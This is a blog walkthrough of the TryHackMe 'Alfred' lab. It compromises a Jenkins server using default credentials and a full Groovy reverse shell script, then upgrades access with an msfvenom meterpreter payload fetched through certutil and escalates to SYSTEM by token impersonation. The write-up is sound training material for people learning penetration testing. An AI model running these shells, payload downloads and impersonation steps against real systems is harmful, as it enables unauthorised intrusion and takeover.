Alfred Can't Stop this SeImpersonatePrivilege Vulnerability

Alfred Can't Stop this SeImpersonatePrivilege Vulnerability

This walkthrough will go over the Alfred room found on TryHackMe. The objective behind this room is to exploit a misconfigured Jenkins server, obtain a reverse shell, and escalate privileges by leveraging a SeImpersonatePrivilege capability on a low-level user to obtain NT AUTHORITY\SYSTEM level privileges.

Step 1: Nmap

nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
┌──(root㉿kali)-[~]
└─# nmap -sC -sV -O -p- -Pn alfred.thm --min-rate=1000
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-22 17:33 MDT
Nmap scan report for alfred.thm (10.10.70.88)
Host is up (0.17s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE    VERSION
80/tcp   open  http       Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Site doesn't have a title (text/html).
3389/tcp open  tcpwrapped
8080/tcp open  http       Jetty 9.4.z-SNAPSHOT
| http-robots.txt: 1 disallowed entry 
|_/
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (87%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_7::sp1 cpe:/o:microsoft:windows_8.1:r1
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 8 (87%), Microsoft Windows Server 2008 R2 SP1 (87%), Microsoft Windows Server 2008 (85%), Microsoft Windows Server 2008 R2 (85%), Microsoft Windows 7 SP1 (85%), Microsoft Windows 8.1 R1 (85%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 148.82 seconds

From this scan, we identified three open ports: 80, 3389, and 8080.

Port 80:

Port 8080:

Step 2: Logging In

Trying some default login credentials, we discover that admin:admin works.

Step 3: Initial Foothold

Peeking around the system, we find an area where we can use groovy scripts. This will be our way into the box.

We're using a groovy shell which can be found on PayloadsAllTheThings.

String host="10.0.0.1";
int port=4242;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Running this script inside the built-in Script Console calls our attack box and drops us into a shell.

From here we find our user.txt flag located in C:\Users\bruce\Desktop\ .

Step 4: Upgrade to Meterpreter Shell

First, we want to generate our payload using msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.13.28.215 LPORT=1335 --format exe -o payload.exe

From the victim, we're going to use certutil to download it.

certutil.exe -urlcache -f http://10.13.28.215:8000/payload.exe payload.exe

Now we fire up msfconsole and set up our handler to catch the shell.

  1. use exploit/multi/handler

  2. set payload windows/meterpreter/reverse_tcp

  3. set LHOST <ATTACKER_IP>

  4. set LPORT 1335

  5. exploit

Once the payload.exe is run on the victim machine, our handler will catch the shell and drop us in.

Step 5: Privesc

Let's see what privileges we have currently by typing whoami /priv.

Nice. We have SeImpersonatePrivilege, let's exploit this vulnerability. We can achieve this by using the incognito module built into metasploit.

Next, we want to impersonate the Administrator's token. We can do this by typing the following command: impersonate_token "BUILTIN\Administrators".

Now let's migrate to a process with correct permissions. The safest bet is to always migrate to the services.exe service.

  1. View processes: ps

  2. Find the PID of services.exe

  3. migrate <PID>

Now that we're successfully NT AUTHORITY\SYSTEM, let's find our root flag and complete this room.

This room was a great introduction to AD pentesting. After going through this, I realized I have a long way ahead of me until I feel comfortable enough to sit down for the PNPT certification by TCM Security. I hope you enjoyed this walkthrough of the Alfred room found on TryHackMe, and as always, Happy Hacking.

Did you find this article valuable?

Support Jake Garrison by becoming a sponsor. Any amount is appreciated!